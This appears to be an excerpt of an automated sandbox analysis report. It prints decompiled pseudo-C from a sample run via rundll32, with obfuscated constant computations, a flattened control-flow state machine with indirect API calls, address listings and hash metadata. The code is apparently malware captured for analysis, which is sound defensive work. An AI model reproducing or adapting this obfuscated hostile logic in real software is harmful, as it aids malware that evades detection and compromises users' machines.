                                                                                                                      				_v460 = _v460 + 0x6999;
                                                                                                                      				_v460 = _v460 ^ 0x4ac4129f;
                                                                                                                      				_v316 = 0x9c2147;
                                                                                                                      				_v316 = _v316 | 0xf1f8cc6e;
                                                                                                                      				_v316 = _v316 ^ 0xf1f4b434;
                                                                                                                      				_v524 = 0x2e48d0;
                                                                                                                      				_v524 = _v524 + 0xffff862d;
                                                                                                                      				_v524 = _v524 + 0x29e8;
                                                                                                                      				_v524 = _v524 * 0x4b;
                                                                                                                      				_v524 = _v524 ^ 0x0d7cea3a;
                                                                                                                      				_v384 = 0x8701af;
                                                                                                                      				_v384 = _v384 + 0xf5cc;
                                                                                                                      				_v384 = _v384 >> 7;
                                                                                                                      				_v384 = _v384 ^ 0x000bfa6c;
                                                                                                                      				_v484 = 0x89e0a0;
                                                                                                                      				_v484 = _v484 >> 6;
                                                                                                                      				_v484 = _v484 << 0xd;
                                                                                                                      				_v484 = _v484 | 0xc3b3473c;
                                                                                                                      				_v484 = _v484 ^ 0xc7fe9c77;
                                                                                                                      				_v516 = 0xee0a8f;
                                                                                                                      				_v516 = _v516 ^ 0x55897709;
                                                                                                                      				_v516 = _v516 | 0x2d6779b6;
                                                                                                                      				_v516 = _v516 >> 0xc;
                                                                                                                      				_v516 = _v516 ^ 0x0009a0b5;
                                                                                                                      				_v408 = 0x69ddc;
                                                                                                                      				_v408 = _v408 + 0xffff558a;
                                                                                                                      				_v408 = _v408 | 0x7b9a8e55;
                                                                                                                      				_v408 = _v408 ^ 0x7b9d6bde;
                                                                                                                      				_v440 = 0x3ec00a;
                                                                                                                      				_t708 = 7;
                                                                                                                      				_v440 = _v440 * 0x6d;
                                                                                                                      				_v440 = _v440 ^ 0x82501226;
                                                                                                                      				_v440 = _v440 ^ 0x98e12210;
                                                                                                                      				_v360 = 0xa9836;
                                                                                                                      				_t709 = 0x66;
                                                                                                                      				_v360 = _v360 / _t708;
                                                                                                                      				_v360 = _v360 ^ 0x000ed550;
                                                                                                                      				_v508 = 0xae1f70;
                                                                                                                      				_v508 = _v508 / _t709;
                                                                                                                      				_v508 = _v508 | 0xf9ffdfbb;
                                                                                                                      				_v508 = _v508 ^ 0xf9f8fc25;
                                                                                                                      				_v324 = 0xeedbe0;
                                                                                                                      				_v324 = _v324 + 0xffffa9bd;
                                                                                                                      				_v324 = _v324 ^ 0x00e20b5f;
                                                                                                                      				_v392 = 0x6a2c5c;
                                                                                                                      				_v392 = _v392 | 0xb7dff57a;
                                                                                                                      				_v392 = _v392 << 0xb;
                                                                                                                      				_v392 = _v392 ^ 0xffee34eb;
                                                                                                                      				_v432 = 0x407729;
                                                                                                                      				_v432 = _v432 + 0xb79f;
                                                                                                                      				_v432 = _v432 | 0x8bf66f7a;
                                                                                                                      				_v432 = _v432 ^ 0x8bfc9481;
                                                                                                                      				_v424 = 0x63ea97;
                                                                                                                      				_v424 = _v424 >> 0x10;
                                                                                                                      				_v424 = _v424 + 0xffffc4e0;
                                                                                                                      				_v424 = _v424 ^ 0xfffae0f6;
                                                                                                                      				_v332 = 0x7c55b7;
                                                                                                                      				_t710 = 0x1b;
                                                                                                                      				_v332 = _v332 / _t710;
                                                                                                                      				_v332 = _v332 ^ 0x0008067b;
                                                                                                                      				_v352 = 0x1d2ffa;
                                                                                                                      				_t711 = 0x70;
                                                                                                                      				_v352 = _v352 * 0x3b;
                                                                                                                      				_v352 = _v352 ^ 0x06b3fb37;
                                                                                                                      				_v416 = 0x356707;
                                                                                                                      				_t712 = 0x4d;
                                                                                                                      				_v416 = _v416 / _t711;
                                                                                                                      				_v416 = _v416 * 0xf;
                                                                                                                      				_v416 = _v416 ^ 0x000a8be6;
                                                                                                                      				_v400 = 0x975723;
                                                                                                                      				_v400 = _v400 | 0x269443d2;
                                                                                                                      				_v400 = _v400 << 9;
                                                                                                                      				_v400 = _v400 ^ 0x2eac99c7;
                                                                                                                      				_v396 = 0x86389d;
                                                                                                                      				_v396 = _v396 ^ 0xdd3767b8;
                                                                                                                      				_t713 = 0x6d;
                                                                                                                      				_v396 = _v396 / _t712;
                                                                                                                      				_v396 = _v396 ^ 0x02eba2ca;
                                                                                                                      				_v404 = 0xdbbdba;
                                                                                                                      				_v404 = _v404 << 9;
                                                                                                                      				_v404 = _v404 / _t713;
                                                                                                                      				_v404 = _v404 ^ 0x01a57735;
                                                                                                                      				_v356 = 0xfabb05;
                                                                                                                      				_v356 = _v356 | 0x8af6c05e;
                                                                                                                      				_v356 = _v356 ^ 0x8af1d93b;
                                                                                                                      				_v380 = 0x2efe0b;
                                                                                                                      				_v380 = _v380 | 0x60ccafe9;
                                                                                                                      				_v380 = _v380 >> 2;
                                                                                                                      				_v380 = _v380 ^ 0x183e3099;
                                                                                                                      				_v348 = 0x4aabda;
                                                                                                                      				_v348 = _v348 ^ 0x6d9ddbef;
                                                                                                                      				_v348 = _v348 ^ 0x6dd36298;
                                                                                                                      				_v388 = 0x49b388;
                                                                                                                      				_v388 = _v388 | 0xfd8f470c;
                                                                                                                      				_v388 = _v388 << 0xa;
                                                                                                                      				_v388 = _v388 ^ 0x3fdfba02;
                                                                                                                      				_v472 = 0xbd7846;
                                                                                                                      				_v472 = _v472 + 0xffff85c8;
                                                                                                                      				_v472 = _v472 >> 0xd;
                                                                                                                      				_v472 = _v472 >> 0xc;
                                                                                                                      				_v472 = _v472 ^ 0x00060807;
                                                                                                                      				_v456 = 0xd92e51;
                                                                                                                      				_t714 = 0x17;
                                                                                                                      				_v456 = _v456 / _t714;
                                                                                                                      				_v456 = _v456 >> 0xd;
                                                                                                                      				_v456 = _v456 + 0xffff8d85;
                                                                                                                      				_v456 = _v456 ^ 0xfffee4a4;
                                                                                                                      				_v340 = 0x27bb27;
                                                                                                                      				_v340 = _v340 | 0xb25f39d4;
                                                                                                                      				_v340 = _v340 ^ 0xb27a85e4;
                                                                                                                      				_v464 = 0x5d8dc9;
                                                                                                                      				_v464 = _v464 + 0x522d;
                                                                                                                      				_v464 = _v464 << 1;
                                                                                                                      				_t623 = 0xb;
                                                                                                                      				_v464 = _v464 / _t623;
                                                                                                                      				_v464 = _v464 ^ 0x0017bd02;
                                                                                                                      				_v364 = 0xb86d20;
                                                                                                                      				_v364 = _v364 + 0x9843;
                                                                                                                      				_v364 = _v364 ^ 0x00bb00fc;
                                                                                                                      				_v480 = 0x632eda;
                                                                                                                      				_v480 = _v480 + 0xffff6eee;
                                                                                                                      				_v480 = _v480 + 0xffff8324;
                                                                                                                      				_v480 = _v480 + 0x3513;
                                                                                                                      				_v480 = _v480 ^ 0x006160eb;
                                                                                                                      				_v412 = 0xc84084;
                                                                                                                      				_t715 = 0x19;
                                                                                                                      				_t729 = _v312;
                                                                                                                      				_t624 = _v312;
                                                                                                                      				_v412 = _v412 / _t715;
                                                                                                                      				_v412 = _v412 | 0x26b33a0b;
                                                                                                                      				_v412 = _v412 ^ 0x26bcb4da;
                                                                                                                      				_v420 = 0x8ac001;
                                                                                                                      				_v420 = _v420 << 0xf;
                                                                                                                      				_v420 = _v420 ^ 0xe10d88e3;
                                                                                                                      				_v420 = _v420 ^ 0x810a258e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						_t686 = 0x14e2fae;
                                                                                                                      						do {
                                                                                                                      							while(1) {
                                                                                                                      								L3:
                                                                                                                      								_t736 = _t723 - 0x6872271;
                                                                                                                      								if(_t736 <= 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6af60a9;
                                                                                                                      								if(_t723 == 0x6af60a9) {
                                                                                                                      									_push(0x4000);
                                                                                                                      									_push(0x4000);
                                                                                                                      									_t574 = E00353512(0x4000);
                                                                                                                      									_v536 = _t574;
                                                                                                                      									__eflags = _t574;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t633 = _v488;
                                                                                                                      										_t723 = 0x3b379fe;
                                                                                                                      										_t686 = 0x14e2fae;
                                                                                                                      										goto L31;
                                                                                                                      									}
                                                                                                                      									_t723 = 0x2b997a9;
                                                                                                                      									L13:
                                                                                                                      									_t633 = _v488;
                                                                                                                      									_t686 = 0x14e2fae;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0x6fc00ac;
                                                                                                                      								if(_t723 == 0x6fc00ac) {
                                                                                                                      									_t724 =  &_v256;
                                                                                                                      									_t687 = E0034EF71(8, 0x10);
                                                                                                                      									_t578 = _v520;
                                                                                                                      									__eflags = _t578 - _t687;
                                                                                                                      									if(_t578 < _t687) {
                                                                                                                      										_t689 = _t687 - _t578;
                                                                                                                      										_t719 = _t724;
                                                                                                                      										_t654 = _t689 >> 1;
                                                                                                                      										__eflags = _t654;
                                                                                                                      										_t621 = memset(_t719, 0x2d002d, _t654 << 2);
                                                                                                                      										asm("adc ecx, ecx");
                                                                                                                      										_t724 = _t724 + _t689 * 2;
                                                                                                                      										memset(_t719 + _t654, _t621, 0);
                                                                                                                      										_t730 =  &(_t730[6]);
                                                                                                                      									}
                                                                                                                      									_push(E0034EF71(8, 0x10));
                                                                                                                      									_push(_v436);
                                                                                                                      									_push(_t724);
                                                                                                                      									_t636 = 0xb;
                                                                                                                      									E00345A07(_t636, _v428);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6af60a9;
                                                                                                                      									L12:
                                                                                                                      									_t583 = _v536;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xa6d69a8;
                                                                                                                      								if(_t723 == 0xa6d69a8) {
                                                                                                                      									_t722 = E0034EF71(1, 8);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v328);
                                                                                                                      									_push( &_v288);
                                                                                                                      									_t637 = 9;
                                                                                                                      									E00345A07(_t637, _v336);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0xb1820f0;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xb1820f0;
                                                                                                                      								if(_t723 == 0xb1820f0) {
                                                                                                                      									_t722 = E0034EF71(4, 0x10);
                                                                                                                      									_push(_t722);
                                                                                                                      									_push(_v452);
                                                                                                                      									_push( &_v128);
                                                                                                                      									_t638 = 0xb;
                                                                                                                      									E00345A07(_t638, _v500);
                                                                                                                      									_t730 =  &(_t730[5]);
                                                                                                                      									_t723 = 0x6fc00ac;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      								__eflags = _t723 - 0xff9e75d;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									goto L31;
                                                                                                                      								}
                                                                                                                      								_t723 = 0xa6d69a8;
                                                                                                                      							}
                                                                                                                      							if(_t736 == 0) {
                                                                                                                      								E0035FD29( *_t633, _v416, _t624, _v400,  *((intOrPtr*)(_t633 + 4)));
                                                                                                                      								_t488 =  &_v488; // 0x6160eb
                                                                                                                      								_t633 =  *_t488;
                                                                                                                      								_t730 =  &(_t730[3]);
                                                                                                                      								_t723 = 0x605d68b;
                                                                                                                      								_t624 = _t624 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							if(_t723 == _t686) {
                                                                                                                      								_push(0x34141c);
                                                                                                                      								_push(_v360);
                                                                                                                      								_v308 = _t722 + _t729;
                                                                                                                      								_t624 = E0034F545( &_v128, __eflags, _v508, _t722 + _t729 - _t729,  &_v256, _v324,  &_v288, _v392, E0034BB4B(_v408, _v440, __eflags), _v432) + _t729;
                                                                                                                      								E0034AE03(_v424, _v332, _v352, _t595);
                                                                                                                      								_t730 =  &(_t730[0xc]);
                                                                                                                      								_t723 = 0x6872271;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2109cc3) {
                                                                                                                      								_t722 = _t722 +  *((intOrPtr*)(_t633 + 4));
                                                                                                                      								_push(_t633);
                                                                                                                      								_push(_t633);
                                                                                                                      								_t729 = E00353512(_t722);
                                                                                                                      								_t583 = _v536;
                                                                                                                      								__eflags = _t729;
                                                                                                                      								_t633 = _v488;
                                                                                                                      								_t686 = 0x14e2fae;
                                                                                                                      								_t723 =  !=  ? 0x14e2fae : 0x6704547;
                                                                                                                      								goto L3;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x2b997a9) {
                                                                                                                      								_push(_v492);
                                                                                                                      								_push(_v368);
                                                                                                                      								_push(0x3413bc);
                                                                                                                      								_t604 = E0034AB66(_v376, _v448, __eflags);
                                                                                                                      								_push( &_v256);
                                                                                                                      								_push(_t604);
                                                                                                                      								_push(_t722);
                                                                                                                      								_push(_v536);
                                                                                                                      								 *((intOrPtr*)(E0034C1DC(_v376, 0xbf7d08b0, 0xef)))();
                                                                                                                      								E0034AE03(_v460, _v316, _v524, _t604);
                                                                                                                      								_t730 =  &(_t730[9]);
                                                                                                                      								_t723 = 0x2109cc3;
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if(_t723 == 0x605d68b) {
                                                                                                                      								_push(0x34138c);
                                                                                                                      								_push(_v356);
                                                                                                                      								_t614 = E0034F060(E0034BB4B(_v396, _v404, __eflags), __eflags, _v348, _t624, _v308 - _t624, _v388,  &_v256, _v472);
                                                                                                                      								E0034AE03(_v456, _v340, _v464, _t610);
                                                                                                                      								_t616 = _v312;
                                                                                                                      								_t628 = _t624 + _t614 - _t729;
                                                                                                                      								__eflags = _t628;
                                                                                                                      								 *_t616 = _t729;
                                                                                                                      								 *(_t616 + 4) = _t628;
                                                                                                                      								L34:
                                                                                                                      								return _v536;
                                                                                                                      							}
                                                                                                                      							if(_t723 != 0x6704547) {
                                                                                                                      								goto L31;
                                                                                                                      							}
                                                                                                                      							E003468DE(_v364, _v480, _v412, _v420, _t583);
                                                                                                                      							return 0;
                                                                                                                      							L31:
                                                                                                                      							__eflags = _t723 - 0x3b379fe;
                                                                                                                      						} while (__eflags != 0);
                                                                                                                      						goto L34;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00356ab2
                                                                                                                      0x00356ab9
                                                                                                                      0x00356ac4
                                                                                                                      0x00356acc
                                                                                                                      0x00356ad9
                                                                                                                      0x00356add
                                                                                                                      0x00356ae5
                                                                                                                      0x00356aed
                                                                                                                      0x00356af5
                                                                                                                      0x00356afe
                                                                                                                      0x00356b01
                                                                                                                      0x00356b05
                                                                                                                      0x00356b0d
                                                                                                                      0x00356b18
                                                                                                                      0x00356b20
                                                                                                                      0x00356b2b
                                                                                                                      0x00356b33
                                                                                                                      0x00356b3b
                                                                                                                      0x00356b43
                                                                                                                      0x00356b4b
                                                                                                                      0x00356b53
                                                                                                                      0x00356b5e
                                                                                                                      0x00356b69
                                                                                                                      0x00356b74
                                                                                                                      0x00356b7c
                                                                                                                      0x00356b84
                                                                                                                      0x00356b8c
                                                                                                                      0x00356b94
                                                                                                                      0x00356b9f
                                                                                                                      0x00356baa
                                                                                                                      0x00356bb5
                                                                                                                      0x00356bbd
                                                                                                                      0x00356bc5
                                                                                                                      0x00356bcd
                                                                                                                      0x00356bd5
                                                                                                                      0x00356bdd
                                                                                                                      0x00356be5
                                                                                                                      0x00356bea
                                                                                                                      0x00356bf2
                                                                                                                      0x00356bfa
                                                                                                                      0x00356c02
                                                                                                                      0x00356c0d
                                                                                                                      0x00356c18
                                                                                                                      0x00356c23
                                                                                                                      0x00356c2b
                                                                                                                      0x00356c33
                                                                                                                      0x00356c40
                                                                                                                      0x00356c44
                                                                                                                      0x00356c4c
                                                                                                                      0x00356c57
                                                                                                                      0x00356c62
                                                                                                                      0x00356c6a
                                                                                                                      0x00356c75
                                                                                                                      0x00356c7d
                                                                                                                      0x00356c82
                                                                                                                      0x00356c87
                                                                                                                      0x00356c8f
                                                                                                                      0x00356c97
                                                                                                                      0x00356c9f
                                                                                                                      0x00356ca7
                                                                                                                      0x00356caf
                                                                                                                      0x00356cb4
                                                                                                                      0x00356cbc
                                                                                                                      0x00356cc7
                                                                                                                      0x00356cd4
                                                                                                                      0x00356cdf
                                                                                                                      0x00356cea
                                                                                                                      0x00356cf9
                                                                                                                      0x00356cfc
                                                                                                                      0x00356d00
                                                                                                                      0x00356d08
                                                                                                                      0x00356d10
                                                                                                                      0x00356d24
                                                                                                                      0x00356d25
                                                                                                                      0x00356d2e
                                                                                                                      0x00356d39
                                                                                                                      0x00356d49
                                                                                                                      0x00356d4f
                                                                                                                      0x00356d57
                                                                                                                      0x00356d5f
                                                                                                                      0x00356d6a
                                                                                                                      0x00356d75
                                                                                                                      0x00356d80
                                                                                                                      0x00356d8b
                                                                                                                      0x00356d96
                                                                                                                      0x00356d9e
                                                                                                                      0x00356da9
                                                                                                                      0x00356db1
                                                                                                                      0x00356db9
                                                                                                                      0x00356dc1
                                                                                                                      0x00356dc9
                                                                                                                      0x00356dd4
                                                                                                                      0x00356ddc
                                                                                                                      0x00356de7
                                                                                                                      0x00356df2
                                                                                                                      0x00356e04
                                                                                                                      0x00356e09
                                                                                                                      0x00356e12
                                                                                                                      0x00356e1d
                                                                                                                      0x00356e30
                                                                                                                      0x00356e33
                                                                                                                      0x00356e3a
                                                                                                                      0x00356e45
                                                                                                                      0x00356e59
                                                                                                                      0x00356e5a
                                                                                                                      0x00356e6d
                                                                                                                      0x00356e74
                                                                                                                      0x00356e7f
                                                                                                                      0x00356e8a
                                                                                                                      0x00356e95
                                                                                                                      0x00356e9d
                                                                                                                      0x00356ea8
                                                                                                                      0x00356eb3
                                                                                                                      0x00356ec7
                                                                                                                      0x00356ec8
                                                                                                                      0x00356ecf
                                                                                                                      0x00356eda
                                                                                                                      0x00356ee5
                                                                                                                      0x00356efa
                                                                                                                      0x00356f03
                                                                                                                      0x00356f0e
                                                                                                                      0x00356f19
                                                                                                                      0x00356f24
                                                                                                                      0x00356f2f
                                                                                                                      0x00356f3a
                                                                                                                      0x00356f45
                                                                                                                      0x00356f4d
                                                                                                                      0x00356f58
                                                                                                                      0x00356f63
                                                                                                                      0x00356f6e
                                                                                                                      0x00356f79
                                                                                                                      0x00356f84
                                                                                                                      0x00356f8f
                                                                                                                      0x00356f97
                                                                                                                      0x00356fa2
                                                                                                                      0x00356faa
                                                                                                                      0x00356fb2
                                                                                                                      0x00356fb7
                                                                                                                      0x00356fbc
                                                                                                                      0x00356fc4
                                                                                                                      0x00356fd0
                                                                                                                      0x00356fd5
                                                                                                                      0x00356fdb
                                                                                                                      0x00356fe0
                                                                                                                      0x00356fe8
                                                                                                                      0x00356ff0
                                                                                                                      0x00356ffb
                                                                                                                      0x00357006
                                                                                                                      0x00357011
                                                                                                                      0x00357019
                                                                                                                      0x00357021
                                                                                                                      0x00357029
                                                                                                                      0x0035702e
                                                                                                                      0x00357034
                                                                                                                      0x0035703c
                                                                                                                      0x00357047
                                                                                                                      0x00357052
                                                                                                                      0x0035705d
                                                                                                                      0x00357065
                                                                                                                      0x0035706d
                                                                                                                      0x00357075
                                                                                                                      0x0035707d
                                                                                                                      0x00357085
                                                                                                                      0x00357097
                                                                                                                      0x003570a1
                                                                                                                      0x003570a8
                                                                                                                      0x003570af
                                                                                                                      0x003570b6
                                                                                                                      0x003570c1
                                                                                                                      0x003570cc
                                                                                                                      0x003570d7
                                                                                                                      0x003570df
                                                                                                                      0x003570ea
                                                                                                                      0x003570f5
                                                                                                                      0x003570f5
                                                                                                                      0x003570f9
                                                                                                                      0x003570f9
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x003570fe
                                                                                                                      0x00357104
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003572d3
                                                                                                                      0x003572d9
                                                                                                                      0x00357418
                                                                                                                      0x00357419
                                                                                                                      0x0035741a
                                                                                                                      0x0035741f
                                                                                                                      0x00357425
                                                                                                                      0x00357427
                                                                                                                      0x00357433
                                                                                                                      0x00357437
                                                                                                                      0x0035743c
                                                                                                                      0x00000000
                                                                                                                      0x0035743c
                                                                                                                      0x00357429
                                                                                                                      0x003571d4
                                                                                                                      0x003571d4
                                                                                                                      0x003570f9
                                                                                                                      0x00000000
                                                                                                                      0x003570f9
                                                                                                                      0x003572df
                                                                                                                      0x003572e5
                                                                                                                      0x00357390
                                                                                                                      0x003573a7
                                                                                                                      0x003573a9
                                                                                                                      0x003573af
                                                                                                                      0x003573b1
                                                                                                                      0x003573b3
                                                                                                                      0x003573b5
                                                                                                                      0x003573be
                                                                                                                      0x003573be
                                                                                                                      0x003573c0
                                                                                                                      0x003573c2
                                                                                                                      0x003573c4

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $^Z$'xUx$(q$)E1$)w@$-R$:|$>,b$\,j$\f%$izV$`a$x
                                                                                                                      • API String ID: 0-215870970
                                                                                                                      • Opcode ID: c86624263ec19a909321a91818ada000c16eb3619b6e299e8d843c1229827d46
                                                                                                                      • Instruction ID: 0e9f8534a201c6f05e6547da2c9f6c04795aeff35774bd10be8e4552c0a6c908
                                                                                                                      • Opcode Fuzzy Hash: c86624263ec19a909321a91818ada000c16eb3619b6e299e8d843c1229827d46
                                                                                                                      • Instruction Fuzzy Hash: 225210725083819FD375CF25C98AB8BBBE1BBC4358F10891DE5DA9A260D7B09849CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00342FA1(void* __ecx) {
                                                                                                                      				char _v524;
                                                                                                                      				char _v1044;
                                                                                                                      				char _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				intOrPtr _v1572;
                                                                                                                      				intOrPtr _v1576;
                                                                                                                      				intOrPtr _v1588;
                                                                                                                      				char _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				signed int _v1708;
                                                                                                                      				signed int _v1712;
                                                                                                                      				signed int _v1716;
                                                                                                                      				signed int _v1720;
                                                                                                                      				signed int _v1724;
                                                                                                                      				signed int _v1728;
                                                                                                                      				signed int _v1732;
                                                                                                                      				signed int _v1736;
                                                                                                                      				signed int _v1740;
                                                                                                                      				signed int _v1744;
                                                                                                                      				signed int _v1748;
                                                                                                                      				signed int _v1752;
                                                                                                                      				signed int _v1756;
                                                                                                                      				signed int _v1760;
                                                                                                                      				signed int _v1764;
                                                                                                                      				signed int _v1768;
                                                                                                                      				signed int _v1772;
                                                                                                                      				signed int _v1776;
                                                                                                                      				signed int _v1780;
                                                                                                                      				signed int _v1784;
                                                                                                                      				signed int _v1788;
                                                                                                                      				signed int _v1792;
                                                                                                                      				signed int _v1796;
                                                                                                                      				signed int _v1800;
                                                                                                                      				signed int _v1804;
                                                                                                                      				signed int _v1808;
                                                                                                                      				signed int _v1812;
                                                                                                                      				signed int _v1816;
                                                                                                                      				signed int _v1820;
                                                                                                                      				signed int _v1824;
                                                                                                                      				signed int _v1828;
                                                                                                                      				signed int _v1832;
                                                                                                                      				void* _t602;
                                                                                                                      				void* _t605;
                                                                                                                      				void* _t612;
                                                                                                                      				void* _t615;
                                                                                                                      				void* _t627;
                                                                                                                      				void* _t629;
                                                                                                                      				signed int _t631;
                                                                                                                      				signed int _t632;
                                                                                                                      				signed int _t633;
                                                                                                                      				signed int _t634;
                                                                                                                      				signed int _t635;
                                                                                                                      				signed int _t636;
                                                                                                                      				signed int _t637;
                                                                                                                      				signed int _t638;
                                                                                                                      				signed int _t639;
                                                                                                                      				signed int _t640;
                                                                                                                      				signed int _t641;
                                                                                                                      				signed int _t642;
                                                                                                                      				signed int _t643;
                                                                                                                      				signed int _t644;
                                                                                                                      				signed int _t645;
                                                                                                                      				signed int _t646;
                                                                                                                      				void* _t647;
                                                                                                                      				signed int _t650;
                                                                                                                      				signed int _t696;
                                                                                                                      				signed int _t706;
                                                                                                                      				void* _t708;
                                                                                                                      				void* _t713;
                                                                                                                      				void* _t714;
                                                                                                                      
                                                                                                                      				_v1568 = _v1568 & 0x00000000;
                                                                                                                      				_v1596 = _v1596 & 0x00000000;
                                                                                                                      				_v1576 = 0x5e97ec;
                                                                                                                      				_v1572 = 0x72e58f;
                                                                                                                      				_v1768 = 0x70cb3c;
                                                                                                                      				_v1768 = _v1768 + 0xffffc098;
                                                                                                                      				_v1768 = _v1768 >> 0xd;
                                                                                                                      				_v1768 = _v1768 ^ 0x02000384;
                                                                                                                      				_v1820 = 0xee4d2b;
                                                                                                                      				_t15 =  &_v1820; // 0xee4d2b
                                                                                                                      				_t629 = __ecx;
                                                                                                                      				_t708 = 0x23fa72;
                                                                                                                      				_t631 = 0x3b;
                                                                                                                      				_v1820 =  *_t15 / _t631;
                                                                                                                      				_t632 = 0x76;
                                                                                                                      				_v1820 = _v1820 * 0x22;
                                                                                                                      				_v1820 = _v1820 + 0xffff6a70;
                                                                                                                      				_v1820 = _v1820 ^ 0x0087d8ad;
                                                                                                                      				_v1744 = 0x47ad5e;
                                                                                                                      				_v1744 = _v1744 + 0xffff8cd4;
                                                                                                                      				_v1744 = _v1744 * 0x70;
                                                                                                                      				_v1744 = _v1744 ^ 0x1f2feb3a;
                                                                                                                      				_v1628 = 0xf34c5;
                                                                                                                      				_v1628 = _v1628 + 0x5841;
                                                                                                                      				_v1628 = _v1628 ^ 0x0009a1de;
                                                                                                                      				_v1812 = 0x9823b5;
                                                                                                                      				_v1812 = _v1812 ^ 0xd7f45b6c;
                                                                                                                      				_v1812 = _v1812 / _t632;
                                                                                                                      				_v1812 = _v1812 ^ 0x01df5c7b;
                                                                                                                      				_v1812 = _v1812 ^ 0x000f259a;
                                                                                                                      				_v1608 = 0x734624;
                                                                                                                      				_v1608 = _v1608 >> 0xe;
                                                                                                                      				_v1608 = _v1608 ^ 0x000c01bf;
                                                                                                                      				_v1804 = 0xceac9b;
                                                                                                                      				_v1804 = _v1804 << 0x10;
                                                                                                                      				_t633 = 0x3d;
                                                                                                                      				_v1804 = _v1804 / _t633;
                                                                                                                      				_v1804 = _v1804 + 0x655b;
                                                                                                                      				_v1804 = _v1804 ^ 0x02dbc44e;
                                                                                                                      				_v1736 = 0x9be166;
                                                                                                                      				_v1736 = _v1736 >> 5;
                                                                                                                      				_v1736 = _v1736 ^ 0xd09875ee;
                                                                                                                      				_v1736 = _v1736 ^ 0xd0950b72;
                                                                                                                      				_v1824 = 0xc35391;
                                                                                                                      				_v1824 = _v1824 >> 3;
                                                                                                                      				_v1824 = _v1824 >> 0x10;
                                                                                                                      				_v1824 = _v1824 * 3;
                                                                                                                      				_v1824 = _v1824 ^ 0x00036b47;
                                                                                                                      				_v1800 = 0x15c07f;
                                                                                                                      				_v1800 = _v1800 << 9;
                                                                                                                      				_v1800 = _v1800 >> 4;
                                                                                                                      				_v1800 = _v1800 | 0x1ec023ab;
                                                                                                                      				_v1800 = _v1800 ^ 0x1effac55;
                                                                                                                      				_v1668 = 0x9ff678;
                                                                                                                      				_v1668 = _v1668 >> 6;
                                                                                                                      				_v1668 = _v1668 ^ 0x00061642;
                                                                                                                      				_v1676 = 0x388031;
                                                                                                                      				_v1676 = _v1676 + 0xa9e3;
                                                                                                                      				_v1676 = _v1676 ^ 0x003372a3;
                                                                                                                      				_v1700 = 0x68320b;
                                                                                                                      				_v1700 = _v1700 >> 9;
                                                                                                                      				_v1700 = _v1700 * 0x58;
                                                                                                                      				_v1700 = _v1700 ^ 0x00127519;
                                                                                                                      				_v1728 = 0x8bcc69;
                                                                                                                      				_v1728 = _v1728 + 0xffffee5b;
                                                                                                                      				_v1728 = _v1728 >> 0xf;
                                                                                                                      				_v1728 = _v1728 ^ 0x000f8317;
                                                                                                                      				_v1620 = 0xdd5dd2;
                                                                                                                      				_v1620 = _v1620 + 0xffff3cca;
                                                                                                                      				_v1620 = _v1620 ^ 0x00d1dad8;
                                                                                                                      				_v1756 = 0x5b77fe;
                                                                                                                      				_v1756 = _v1756 >> 0x10;
                                                                                                                      				_v1756 = _v1756 + 0xcf07;
                                                                                                                      				_v1756 = _v1756 ^ 0x0002651f;
                                                                                                                      				_v1600 = 0xe5338f;
                                                                                                                      				_v1600 = _v1600 >> 2;
                                                                                                                      				_v1600 = _v1600 ^ 0x0038d695;
                                                                                                                      				_v1748 = 0x539c61;
